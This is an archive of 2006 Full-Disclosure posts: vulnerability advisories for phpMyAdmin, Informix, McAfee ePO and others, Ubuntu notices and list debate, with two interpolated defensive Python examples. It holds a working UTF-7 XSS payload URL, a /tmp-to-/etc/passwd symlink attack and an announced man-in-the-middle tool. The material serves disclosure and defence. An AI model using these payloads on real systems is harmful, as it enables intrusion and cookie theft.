   phpMyAdmin uses a random token that is stored within the user's session to protect against Cross Site Request Forgeries. CSRF basically means that a website tricks the browser of a visiting user into issuing HTTP requests against another site that does ensure that the request was intended. In case of phpMyAdmin a CSRF vulnerability obviously means that another site could trick the browser of a phpMyAdmin user into issuing arbitrary SQL queries against his database.

   In phpMyAdmin the CSRF protection works like this

     1) Start PHP's Session Handling
     2) Is there already a token assigned to the session?
        -> No: create a random token
     3) Is supplied token equal to session token?
        -> No: unset() all request variables not in white-list

   While this design could actually work the implementation in phpMyAdmin was vulnerable to multiple attacks because before and during the 3 steps mentioned several modifications to the request variable arrays are made and these variables get globalised. (This is done within the PHP code and has nothing to do with register_globals)

   The attacks we found attack different phases of the CSRF protection. The following is an overview of the vulnerabilities within the 3 phases. For each phase several different attacks are possible. Several of the attacks require GPC variables with names that are equal to PHP's superglobals, therefore these attacks are automatically stopped by our Suhosin extension.

   [-- Token Verification --]

   The token verification could be tricked because there existed several flaws in the globalisation routine that allowed destroying the content of the session variables. Additionally the special handling of session variables while register_globals is activated allowed directly setting the session token from within the URL. Obviously it is very easy to "guess" the required token when the token is empty or is set to a value of his choice.

   [-- Determine which variables to unset --]

   The _REQUEST array was used to determine which variables should be unset() but phpMyAdmin contained intended and unintended ways that allowed overwriting the content of the _REQUEST array. In the new version all GPC arrays are used for this process and the unintended way to destroy superglobal arrays within the globalisation was closed.

   [-- Unset variables --]

   Unset() is a dangerous function because older PHP versions (that are still installed on most servers) contained vulnerabilities that allowed bypassing it. For further information take a look at:

   http://www.hardened-php.net/critical_php_vulnerability_explained.124.html

Proof of Concept:

   The Hardened-PHP Project is not going to release exploits for this vulnerability to the public.

Disclosure Timeline:

   23. September 2006 - Contacted phpMyAdmin developers by email
   01. October 2006 - Updated phpMyAdmin was released
   01. October 2006 - Public Disclosure

Recommendation:

   It is strongly recommended to upgrade to the newest version of phpMyAdmin 2.9.0.1 which you can download at:

   http://www.phpmyadmin.net/home_page/downloads.php

   As usual we very strongly recommend to install our Suhosin PHP extension. It disallows request variables with the same name as PHP superglobal arrays. This stops several of the attacks described in this advisory. Grab your copy and more information at:

   http://www.hardened-php.net/suhosin/index.html

GPG-Key:

   http://www.hardened-php.net/hardened-php-signature-key.asc
   pub 1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key
   Key fingerprint = 066F A6D0 E57E 9936 9082 7E52 4439 14CC 0A86 4AA1

Copyright 2006 Stefan Esser. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFFIA0sRDkUzAqGSqERAkvZAKDUgtJio2X8pXqW82tGrBVDTZ7giwCfV00p
9VZ7BjLg4UkiO7WC8RohqOo=
=+flk
-----END PGP SIGNATURE-----

From Valdis.Kletnieks at vt.edu Sun Oct 1 18:59:40 2006
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sun, 01 Oct 2006 13:59:40 -0400
Subject: [Full-disclosure] Truths in "Truth in Caller ID Act"
In-Reply-To: Your message of "Sun, 01 Oct 2006 12:28:41 CDT." <20061001172841.GB15007@infiltrated.net>
References: <20061001172841.GB15007@infiltrated.net>
Message-ID: <200610011759.k91Hxfwa001562@turing-police.cc.vt.edu>

On Sun, 01 Oct 2006 12:28:41 CDT, "J. Oquendo" said:

> Now argumentatively how will the United States seek to prosecute say a
> telemarketer from using a service abroad to traverse back into the U.S.? Let's
> re-read the letter of the law again shall we? "unlawful for any person within
> the United States, etc., etc., to cause any caller identification, etc., etc."
> So how does caller ID change, is it cause by the telemarketer, the server
> sending out the caller ID information, or the provider of that server.
> Obviously the telemarketer led the server to change the information, but
> ultimately the provider dished out the number, hence the provider being the
> true culprit.

You mis-read the legalese. "unlawful for any person... to cause.." is the important text here. That means "If you did something that as an end result made it happen, you're in trouble". If you're in Pensacola, Florida, and issued a command that led to a server in Moscow, Russia generating a bogus caller-ID, then you caused it to happen, and it doesn't matter where/how it *actually* goes down.

> How will U.S. authorities track him down? They won't.

In general, these things usually succumb to a "follow the money" investigation. If the fraudster in Pensacola collected any money, he can be tracked down that way.
Also, the intent here isn't to give the LEOs new ways to track down the crooks, it's giving them new ways to *lock them up*. Let's say they do their "follow the money" thing, and they *know* that Joe Foobar did it. However, some of their evidence and methods are a bit... ummm.... "unconventional", and likely to not hold up if it goes to a jury trial, after all the motions to suppress evidence and so on. However, they *do* have rock-solid proof that Foobar did in fact forge caller-IDs as part of the scam. So you send him up the river for 3 to 5 on 23 counts of forged caller-ID.

Remember - Al Capone never got convicted of any of the evil things everybody knows he did. He ended up in the slammer for income tax evasion....

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061001/71a825fe/attachment.bin

From nobody at cypherpunks.to Sun Oct 1 18:05:13 2006
From: nobody at cypherpunks.to (Anonymous via the Cypherpunks Tonga Remailer)
Date: Sun, 1 Oct 2006 19:05:13 +0200 (CEST)
Subject: [Full-disclosure] FON (fon.com) - Crappy security policy part II
Message-ID: <20061001170513.6C8661712B@mail.cypherpunks.to>

FON (www.fon.com) is some semi-free wifi service. Members contribute their connection and allow other FON users to use their connections for free or small money (depends, the users have to contribute their connection to get free access).

Although the users have to identify at the hotspot, we have problem #1:
===========
The police wouldn't care that you share your internet connection when they find your IP in some logs related to hacking, copyright issues, child porn or whatever. They will first confiscate your equipment and ask afterwards.
problem #2:
===========
It is or was possible to steal anyone's credentials:
http://fon.freddy.eu.org/pcap-decoder/howto/

problem #3:
===========
At the time, when I realized the existence of FON, it was possible to
register with fake e-mail addresses, because they had a lame verification
mechanism (something like http://fon.com/verify.php?email=president at whitehouse.gov).
I successfully registered dozens of fake accounts that way and all these
accounts still work. At least that hole has been fixed in the meantime.

However. Although problem #2 has been made public, no "please set a new
password" requests have been sent to the subscribers. Although they seem to
know that they had problem #3 (otherwise they wouldn't have fixed it), they
did no approach to *verify* their user identities (my "regular" FON account
has not been verified and my fake accounts still work).

From thor at polypath.com Sun Oct 1 20:20:20 2006
From: thor at polypath.com (Thor Larholm)
Date: Sun, 01 Oct 2006 21:20:20 +0200
Subject: [Full-disclosure] 0day in Firefox from ToorCon '06
Message-ID: <452014F4.6010901@polypath.com>

CNet is writing about some 0day vulnerabilities in Firefox that were
demonstrated at ToorCon '06 by Mischa Spiegelmock and Andrew Wbeelsoi:

http://news.zdnet.com/2100-1009_22-6121608.html

Mischa and Andrew also claim to have found about 30 0day vulnerabilities in
Firefox. The article mentions that the vulnerabilities from the presentation
are specific to Firefox's implementation of Javascript and hints that they
are stack overflows. On the other hand, the recent security-related Mozilla
commits following the presentation deal with improper validation of scope
chain lookups in jsxml.c, jsinterp.c and jsiter.c, which could allow
injecting content into the Chrome context.
We'll probably see a security release of Firefox in the next week, but in
the meantime I have put a couple of links to the code diffs that fix these
vulnerabilities at http://blogs.securiteam.com/index.php/archives/657

--
Thor Larholm

From joe at pjprimer.com Sun Oct 1 21:48:25 2006
From: joe at pjprimer.com (Joe Barr)
Date: Sun, 01 Oct 2006 15:48:25 -0500
Subject: [Full-disclosure] Truths in "Truth in Caller ID Act"
In-Reply-To: <20061001172841.GB15007@infiltrated.net>
References: <20061001172841.GB15007@infiltrated.net>
Message-ID: <1159735705.4494.163.camel@localhost>

On Sun, 2006-10-01 at 12:28 -0500, J. Oquendo wrote:
> So the United States government wants to pass the "Truth in Caller ID"
> act. Humorously it will do little to deter criminals from spoofing
> their caller ID and scamming innocent victims. Here is the rule/law
> followed by why it will fail:

The U.S. government will do its duty, that is to say, they will lick the
ass of the telecommunications industry lobbyists and do whatever they damn
well say.

--
It's a strange world when proprietary software is not worth stealing, but
free software is.

From dh at layereddefense.com Sun Oct 1 23:10:11 2006
From: dh at layereddefense.com (Deral Heiland)
Date: Sun, 01 Oct 2006 18:10:11 -0400
Subject: [Full-disclosure] Layered Defense Advisory: TrendMicro OfficeScan Corporate Edition Format String Vulnerability
Message-ID: <7.0.1.0.0.20061001180650.021ff140@sbcglobal.net>

==================================================
Layered Defense Research Advisory 1 October 2006
==================================================
1) Affected Software
TrendMicro OfficeScan Corporate Edition 7.3
==================================================
2) Severity
Rating: Medium risk
Impact: Execution of arbitrary code, potential remote exploit, and denial of service.
==================================================
3) Description of Vulnerability
A format string vulnerability was discovered within Trendmicro OfficeScan
Corporate Edition 7.3. The vulnerability is due to improper processing of
format strings within the OfficeScan Management console's ActiveX Control
"ATXCONSOLE.OCX". A specially crafted format string passed back to the
Management console's Remote Client Install name search would allow access
to the process stack. If successfully exploited, this could allow the user
to execute code of the attacker's choice on the system running the ActiveX
management Console.
==================================================
4) Solution
The solution to fix this vulnerability is addressed by OfficeScan Corporate
Edition 7.3 Patch 1
http://www.trendmicro.com/download/product.asp?productid=5
==================================================
5) Time Table
06/27/2006 -- Reported Vulnerability to Vendor.
06/30/2006 -- Vendor supplied hot fix to Layered Defense for testing.
09/21/2006 -- Vendor releases fix in Patch 1 to public.
==================================================
6) Credits
Discovered by Deral Heiland, www.LayeredDefense.com
==================================================
7) About Layered Defense Research
Layered Defense Research is a group of security professionals that work
together on ethical Research, Testing and Training within the information
security arena.
http://www.layereddefense.com
==================================================

From Valdis.Kletnieks at vt.edu Mon Oct 2 01:52:32 2006
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sun, 01 Oct 2006 20:52:32 -0400
Subject: [Full-disclosure] Truths in "Truth in Caller ID Act"
In-Reply-To: Your message of "Sun, 01 Oct 2006 13:41:56 CDT." <20061001184156.GA15403@infiltrated.net>
References: <20061001184156.GA15403@infiltrated.net>
Message-ID: <200610020052.k920qWCT010437@turing-police.cc.vt.edu>

On Sun, 01 Oct 2006 13:41:56 CDT, "J. Oquendo" said:

> "It shall be unlawful for any person within the United States, in connection
> with any telecommunications service or VOIP service..."
> 1) Teleco/VoIP service is out of bounds here. 2) The User who initiated the
> command is logged from an address somewhere over the rainbow (Tor+Privoxy). 3)
> "within the United States" which? The person, or the telco/VoIP provider? Does
> it have to be both - person and provider. Sounds broad to me.

No, you're intentionally reading it other than what the legal guys will do.
The prosecutor can charge *each and every person involved* who is both a)
within the US and b) took an identifiable action which led to the event.
The person who made the request obviously took an action that led to the
event, and if they're inside the US, they may have a problem. The provider
took an action (by providing the service) and if they're inside the US,
they may want to find a lawyer that can create a good theory of why they
aren't culpable as well.

> 2) Me being the provider, I didn't initiate the spoof, I provided a service.
> Should I be held accountable for upholding the right to privacy?

You took an action which caused the forged caller ID to be sent. Better hope
that the Congressman doesn't have friends over at Dept of Justice who can
make your life miserable.

Also, please note that you're arguing the wrong right - the "right to
privacy" would be applicable if you were trying to protect the person from
a Congressman who was trying to prove the person slept with a political
rival or similar. What you *wanted* to be supporting was the First
Amendment right to anonymous free speech.

> Let's take the case of someone blowing the whistle on government corruption.
> History has shown their life will be ruined.

Sucks to be a whistleblower.
From lcashdol at gmail.com Mon Oct 2 01:24:59 2006
From: lcashdol at gmail.com (Larry Cashdollar)
Date: Sun, 1 Oct 2006 20:24:59 -0400
Subject: [Full-disclosure] IBM Informix Dynamic Server V10.0 File Clobbering during Install

IBM Informix (IDS) V10.0 File Clobbering during Install
10/1/2006

Overview

From the Website (http://www-306.ibm.com/software/data/informix/ids/)

"IBM Informix(r) Dynamic Server (IDS) is a strategic data server in the IBM
Information Management Software portfolio that provides blazing online
transaction processing (OLTP) performance, legendary reliability, and nearly
hands-free administration to businesses of all sizes. IDS 10 offers
significant improvements in performance, availability, security, and
manageability over previous versions, including patent-pending technology
that virtually eliminates downtime and automates many of the tasks
associated with deploying mission-critical enterprise systems."

Vulnerability

During installation the installserver script creates a file in /tmp called
installserver.txt; an unprivileged user can symlink this file to another
file, causing the target file to have the contents of installserver.txt
appended to it.

vapid:/tmp# ls -l /tmp/installserver.txt
lrwxrwxrwx 1 auditor auditor 11 Oct 1 18:27 /tmp/installserver.txt -> /etc/passwd

After installation the contents of installserver.txt were appended to
/etc/passwd.

File Permissions

The default file permissions of the installation package are too open; an
unprivileged user can take advantage of an installation by a privileged
user by injecting code into the installer script.
nobody at vapid:/home/auditor/test$ ls -l
total 273168
-rw-rw-rw- 1 root    root      10328050 Aug  1  2005 Gls.rpm
-rw-rw-rw- 1 32100   1360       5125418 Aug  1  2005 IIF.jar
-rw-rw-rw- 1 root    root      84374286 Aug  1  2005 IIFServer.rpm
-rw-rw-rw- 1 root    root        786557 Aug  1  2005 Message.rpm
drwxrwxrwx 2 32100   1360          4096 Aug  1  2005 doc
-rw-r--r-- 1 auditor auditor  140032000 Oct  1 18:21 iif.10.00.UC3R1TL.Linux.tar
-rwxr-xr-x 1 32100   1360          4424 Aug  1  2005 install_rpm
-rwxrwxrwx 1 32100   1360      38727685 Oct  1 18:46 installserver
-rwxr-xr-x 1 32100   1360          5069 Aug  1  2005 server.ini

Resolution

The installer scripts should have more restrictive default permissions;
also the installserver.txt file should be moved inside of the ismp001
directory that is created during installation.

Credit

Larry W. Cashdollar
http://vapid.dhs.org

From jon at oberheide.org Mon Oct 2 04:08:13 2006
From: jon at oberheide.org (Jon Oberheide)
Date: Sun, 01 Oct 2006 23:08:13 -0400
Subject: [Full-disclosure] [ANNOUNCE] Aimject 0.6
Message-ID: <1159758493.766.8.camel@cosign.example.edu>

Aimject 0.6 has been released:

http://jon.oberheide.org/projects/aimject/

Aimject facilitates man-in-the-middle attacks against AOL Instant
Messenger's OSCAR protocol via a simple GTK interface.

Regards,
Jon Oberheide

--
Jon Oberheide
GnuPG Key: 1024D/F47C17FE
Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE
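The /tmp symlink problem from Larry Cashdollar's Informix post above, as an added example that is not part of either post: the predictable append-to-/tmp pattern beside the open() flags that refuse a pre-planted link, and mkstemp as the usual fix. Everything runs in a scratch directory; the `passwd` file there stands in for /etc/passwd, the written content is a harmless marker, and all names are constructed for this example.

```python
"""Added example (not from the Informix post): the predictable /tmp file the
post describes, beside the open() flags that refuse a pre-planted symlink.
Everything runs in a scratch directory; `passwd` there stands in for
/etc/passwd and the content written is a harmless marker."""
import os
import tempfile


def naive_append(path, data):
    """The installer's pattern: open a fixed, predictable path for append.
    If somebody has already placed a symlink there, the data lands in the
    symlink's target, which is the clobbering the post reports."""
    with open(path, "ab") as f:
        f.write(data)


def safe_create_and_write(path, data):
    """Hardened form: create the file ourselves and refuse to continue if the
    path already exists (O_EXCL) or is a symlink (O_NOFOLLOW); mode 0600
    keeps other users from reading or replacing it."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)


def unpredictable_tempfile(directory):
    """The usual fix: mkstemp picks an unguessable name and creates it with
    O_EXCL, so there is no fixed path for anyone to pre-plant."""
    fd, path = tempfile.mkstemp(prefix="installserver.", suffix=".txt",
                                dir=directory)
    os.close(fd)
    return path


def demo():
    """Stage the scenario (constructed for this example) in a throwaway
    directory and report what each approach did, as a dict so the result
    can be checked rather than only printed."""
    with tempfile.TemporaryDirectory() as workdir:
        target = os.path.join(workdir, "passwd")        # stand-in for /etc/passwd
        link = os.path.join(workdir, "installserver.txt")
        with open(target, "wb") as f:
            f.write(b"root:x:0:0:root:/root:/bin/sh\n")
        os.symlink(target, link)                        # the pre-planted link

        # 1. The naive append follows the link and lands in `target`.
        naive_append(link, b"# marker written by installer\n")
        with open(target, "rb") as f:
            clobbered = b"marker written by installer" in f.read()

        # 2. The hardened open refuses (EEXIST from O_EXCL, or ELOOP).
        try:
            safe_create_and_write(link, b"installer log\n")
            refused = False
        except OSError:
            refused = True

        # 3. mkstemp never uses the fixed name at all.
        tmp_name = os.path.basename(unpredictable_tempfile(workdir))

    return {
        "naive_clobbered_target": clobbered,
        "safe_open_refused": refused,
        "mkstemp_name": tmp_name,
    }


if __name__ == "__main__":
    print(demo())
```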
From i.m.crazy.frog at gmail.com Mon Oct 2 05:08:02 2006
From: i.m.crazy.frog at gmail.com (crazy frog crazy frog)
Date: Mon, 2 Oct 2006 09:38:02 +0530
Subject: [Full-disclosure] Security Rss Feeds
In-Reply-To: <20061001000521.23421.qmail@cgisecurity.net>
References: <8f1f7b60609301405v354994fbu15e967e30ecd7244@mail.gmail.com> <20061001000521.23421.qmail@cgisecurity.net>
Message-ID: <41011d980610012108g2f449f5fjd9653fcd085fab7c@mail.gmail.com>

thanks all for sharing, i found around 240+ list of various security
related RSS Feeds. Get it here:-

http://www.secgeeks.infys.net/security_rss_feeds

_CF

On 10/1/06, bugtraq at cgisecurity.net wrote:
> Add http://www.cgisecurity.com/index.rss as well ;p
> -z
>
> > Add two more to that list
> >
> > http://portal.spidynamics.com/blogs/msutton/rss.aspx
> > http://ha.ckers.org/blog/feed/
> >
> > Paul, thanks for the new add's to me reader :)-
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

--
ting ding ting ding ting ding ting ding ting ding ding
i m crazy frog :)
"oh yeah oh yeah... another wannabe, in hackerland!!!"
From yoshiaki.nakanishi at gmail.com Mon Oct 2 01:28:13 2006
From: yoshiaki.nakanishi at gmail.com (Yoshiaki Nakanishi)
Date: Mon, 2 Oct 2006 09:28:13 +0900
Subject: [Full-disclosure] (no subject)

From psz at maths.usyd.edu.au Mon Oct 2 13:36:20 2006
From: psz at maths.usyd.edu.au (Paul Szabo)
Date: Mon, 2 Oct 2006 22:36:20 +1000
Subject: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])
Message-ID: <200610021236.k92CaKZO014965@asti.maths.usyd.edu.au>

Eiji James Yoshida wrote in
http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/049784.html :

> If 'Encoding' is set to 'Auto Select', and Internet Explorer finds a UTF-7
> string in the response's body, it will set the charset encoding to UTF-7
> automatically ...
> Proof of concept:
> http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-...

I know that Apache servers return

  The requested URL /xyz was not found on this server.

when fetching http://apache.svr/xyz . Trouble is that IE shows a "custom"
error message, ignoring the error body. Pondering, see that
http://en.wikipedia.org/wiki/HTTP_404 says:

> ... Internet Explorer will not display these pages, however, unless they
> are larger than 512 bytes. ...

This provides UXSS (Universal Cross-Site Scripting):

  http://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...

(with a couple of hundred Zs) will do what we want. Works for https also:

  https://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...

Can steal any Apache server (http or https) cookies. I do not have easy
access to ISS servers to test whether similar attacks would work there.

Will Apache fix (carefully escape) the error message? Will MS fix IE to not
be so over-friendly? In the meantime, do not use IE to do anything "private"
like banking...
Cheers,

Paul Szabo   psz at maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia

From muts at remote-exploit.org Mon Oct 2 02:55:37 2006
From: muts at remote-exploit.org (muts)
Date: Mon, 2 Oct 2006 03:55:37 +0200
Subject: [Full-disclosure] McAfee EPO Buffer Overflow
Message-ID: <000f01c6e5c5$dbd20510$2100a8c0@kamau>

####################################################################
#                                                                  #
#  McAfee Epolicy 3.5.0 / Protection Pilot 1.1.0 Buffer Overflow  #
#                                                                  #
#                      www.remote-exploit.org                      #
#                                                                  #
#                   muts {at} remote-exploit org                   #
####################################################################

[-] Product Information

McAfee® ePolicy Orchestrator® is a security management solution that gives
you a coordinated defense against malicious threats and attacks. As your
central hub, you can keep protection up to date; configure and enforce
protection policies; and monitor security status from one centralized
console.

[-] Vulnerability Description

McAfee® ePolicy Orchestrator® contains a pre-authentication buffer overflow
vulnerability in NAISERV.exe. Protection Pilot 1.1.0 uses the same HTTP
server, and is also vulnerable.

[-] Exploit

Proof of concept exploit code is available at
http://www.remote-exploit.org/exploits/mcafee_epolicy_source.pm

[-] Exploitation Details

http://www.remote-exploit.org/advisories/mcafee-epo.pdf

[-] Vendor Status

Vendor was notified July 14th, 2006. ehm.

[-] Credits

The vulnerability was discovered by Mati Aharoni (muts) and xbxice.

[-] Shameless Promotion

Get ready for BackTrack v.2.0!
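Paul Szabo's IE UXSS post above, as an added example that is not part of the thread: the UTF-7 shift sequences in the request path decoded the way an auto-selecting client renders them, a screen over constructed Apache-style access-log lines for paths that hide markup this way, and the server-side check that an error response declares a charset (the configuration point the thread goes on to discuss). Log lines, header dicts and the c%2B%2B path are constructed; the UTF-7 payload is the one quoted in the post.

```python
"""Added example (not from the thread): how a UTF-7 auto-selecting client
sees a request path, a log screen for such paths, and the charset check that
closes the hole on the server side.  Sample inputs are constructed."""
import re
from urllib.parse import unquote

# UTF-7 shift sequence: "+", base64 characters, optional terminating "-".
_UTF7_SHIFT = re.compile(r"\+[A-Za-z0-9+/]+-?")
# Request line inside an Apache common/combined log entry.
_REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def utf7_view(s):
    """Return the string as a UTF-7 auto-selecting client would render it.
    Malformed shift sequences are left as they are (nothing hides in them)."""
    try:
        return s.encode("ascii").decode("utf-7")
    except (UnicodeEncodeError, UnicodeDecodeError):
        return s


def path_hides_markup(path):
    """True when a path carries no literal angle brackets (so a filter that
    looks for '<' passes it) but decodes, as UTF-7, to something with them."""
    path = unquote(path)                 # %2B -> + before looking for shifts
    if "<" in path or ">" in path:
        return False                     # visible markup: not this trick
    if not _UTF7_SHIFT.search(path):
        return False
    decoded = utf7_view(path)
    return "<" in decoded or ">" in decoded


def response_declares_charset(headers):
    """Server-side mitigation: an explicit charset on the Content-Type stops
    the client's auto-select, so the UTF-7 bytes stay inert ASCII."""
    ctype = headers.get("Content-Type", "")
    return re.search(r"charset\s*=\s*\S+", ctype, re.I) is not None


def scan_access_log(lines):
    """Request paths from Apache-style log lines that hide markup in UTF-7."""
    hits = []
    for line in lines:
        m = _REQUEST_LINE.search(line)
        if m and path_hides_markup(m.group(1)):
            hits.append(m.group(1))
    return hits


# Constructed log lines: an ordinary request, the post's UTF-7 payload
# against the 404 page, and an innocent URL-encoded "+" that must not match.
UTF7_PATH = "/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZZ"
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Oct/2006:12:36:20 +1000] "GET /index.html HTTP/1.1" 200 1043',
    f'10.0.0.5 - - [02/Oct/2006:12:36:21 +1000] "GET {UTF7_PATH} HTTP/1.1" 404 812',
    '10.0.0.7 - - [02/Oct/2006:12:36:22 +1000] "GET /docs/c%2B%2B.html HTTP/1.1" 200 512',
]

# Constructed response headers: a stock Apache 404 versus a custom error
# document that left the charset out.
DEFAULT_404_HEADERS = {"Content-Type": "text/html; charset=iso-8859-1"}
CUSTOM_404_HEADERS = {"Content-Type": "text/html"}


if __name__ == "__main__":
    print("client sees:", utf7_view(UTF7_PATH))
    print("flagged paths:", scan_access_log(SAMPLE_LOG))
    print("stock 404 declares charset:", response_declares_charset(DEFAULT_404_HEADERS))
    print("custom 404 declares charset:", response_declares_charset(CUSTOM_404_HEADERS))
```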
From martin.pitt at canonical.com Mon Oct 2 14:40:49 2006
From: martin.pitt at canonical.com (Martin Pitt)
Date: Mon, 2 Oct 2006 15:40:49 +0200
Subject: [Full-disclosure] [USN-355-1] openssh vulnerabilities
Message-ID: <20061002134049.GA4662@piware.de>

===========================================================
Ubuntu Security Notice USN-355-1          October 02, 2006
openssh vulnerabilities
CVE-2006-4924, CVE-2006-5051
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  openssh-server                 1:3.9p1-1ubuntu2.3

Ubuntu 5.10:
  openssh-server                 1:4.1p1-7ubuntu4.2

Ubuntu 6.06 LTS:
  openssh-server                 1:4.2p1-7ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Tavis Ormandy discovered that the SSH daemon did not properly handle
authentication packets with duplicated blocks. By sending specially
crafted packets, a remote attacker could exploit this to cause the ssh
daemon to drain all available CPU resources until the login grace time
expired. (CVE-2006-4924)

Mark Dowd discovered a race condition in the server's signal handling.
A remote attacker could exploit this to crash the server.
(CVE-2006-5051)

Updated packages for Ubuntu 5.04:
Updated packages for Ubuntu 5.10:
Updated packages for Ubuntu 6.06 LTS:

From martin.pitt at canonical.com Mon Oct 2 14:40:55 2006
From: martin.pitt at canonical.com (Martin Pitt)
Date: Mon, 2 Oct 2006 15:40:55 +0200
Subject: [Full-disclosure] [USN-356-1] gdb vulnerability
Message-ID: <20061002134055.GB4662@piware.de>

===========================================================
Ubuntu Security Notice USN-356-1          October 02, 2006
gdb vulnerability
CVE-2006-4146
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  gdb                            6.3-5ubuntu1.2

Ubuntu 5.10:
  gdb                            6.3-6ubuntu2.1

Ubuntu 6.06 LTS:
  gdb                            6.4-1ubuntu5.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Will Drewry, of the Google Security Team, discovered buffer overflows in
GDB's DWARF processing. This would allow an attacker to execute arbitrary
code with user privileges by tricking the user into using GDB to load an
executable that contained malicious debugging information.

Updated packages for Ubuntu 5.04:
Updated packages for Ubuntu 5.10:
Updated packages for Ubuntu 6.06 LTS:
From eaton.lists at gmail.com Mon Oct 2 14:44:27 2006
From: eaton.lists at gmail.com (Brian Eaton)
Date: Mon, 2 Oct 2006 09:44:27 -0400
Subject: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])
In-Reply-To: <200610021236.k92CaKZO014965@asti.maths.usyd.edu.au>
References: <200610021236.k92CaKZO014965@asti.maths.usyd.edu.au>
Message-ID: <242a0a8f0610020644x37f26acate234bf012073e457@mail.gmail.com>

On 10/2/06, Paul Szabo wrote:
> This provides UXSS (Universal Cross-Site Scripting):
>
> http://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...
>
> (with a couple of hundred Zs) will do what we want. Works for https also:
>
> https://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...
>
> Can steal any Apache server (http or https) cookies. I do not have easy
> access to ISS servers to test whether similar attacks would work there.
>
> Will Apache fix (carefully escape) the error message? Will MS fix IE to
> not be so over-friendly?

This should only be possible if neither the HTTP headers nor the HTML page
specifies the character set of the document. If the server doesn't tell IE
the character set, the autodetection "feature" will kick in, and the site
is vulnerable.

I just tested Apache 1.3.37 and Apache 2.2.3, and both specified a
content-type header of "text/html; charset=iso-8859-1" for 404 responses,
so the attack failed. My browser was IE 6.0.2800.1106.

I'm guessing that you tested a server with some kind of customized 404
response that neglected to include a charset specification. That's not a
vulnerability in Apache, that is poor site configuration.
(I do wish that IE didn't have this character set autodetection feature,
or at least that it was restricted to commonly used character sets that
don't use strange encodings for HTML metacharacters.)

Regards,
Brian

From martin.pitt at canonical.com Mon Oct 2 16:09:51 2006
From: martin.pitt at canonical.com (Martin Pitt)
Date: Mon, 2 Oct 2006 17:09:51 +0200
Subject: [Full-disclosure] [USN-354-1] Firefox vulnerabilities
Message-ID: <20061002150951.GC4662@piware.de>

===========================================================
Ubuntu Security Notice USN-354-1           October 02, 2006
firefox vulnerabilities
CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, CVE-2006-3802,
CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807,
CVE-2006-3808, CVE-2006-3809, CVE-2006-3810, CVE-2006-3811,
CVE-2006-3812, CVE-2006-4253, CVE-2006-4340, CVE-2006-4565,
CVE-2006-4566, CVE-2006-4567, CVE-2006-4568, CVE-2006-4569,
CVE-2006-4571
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following
package versions:

Ubuntu 5.10:
  firefox                          1.5.dfsg+1.5.0.7-0ubuntu5.10.3
  firefox-dom-inspector            1.5.dfsg+1.5.0.7-0ubuntu5.10.3
  firefox-gnome-support            1.5.dfsg+1.5.0.7-0ubuntu5.10.3
  devhelp                          0.10-1ubuntu2.1
  devhelp-common                   0.10-1ubuntu2.1
  epiphany-browser                 1.8.2-0ubuntu1.1
  epiphany-browser-dev             1.8.2-0ubuntu1.1
  gnome-app-install                0+20051005.1
  libdevhelp-1-0                   0.10-1ubuntu2.1
  libdevhelp-1-dev                 0.10-1ubuntu2.1
  mozilla-firefox-locale-af-za     1.5-ubuntu5.10-1
  mozilla-firefox-locale-ast-es    1.5-ubuntu5.10-1
  mozilla-firefox-locale-bg-bg     1.5-ubuntu5.10-1
  mozilla-firefox-locale-cs-cz     1.5-ubuntu5.10-1
  mozilla-firefox-locale-da-dk     1.5-ubuntu5.10-1
  mozilla-firefox-locale-de        1.5-ubuntu5.10-1
  mozilla-firefox-locale-de-de     1.5-ubuntu5.10-1
  mozilla-firefox-locale-en-gb     1.5-ubuntu5.10-1
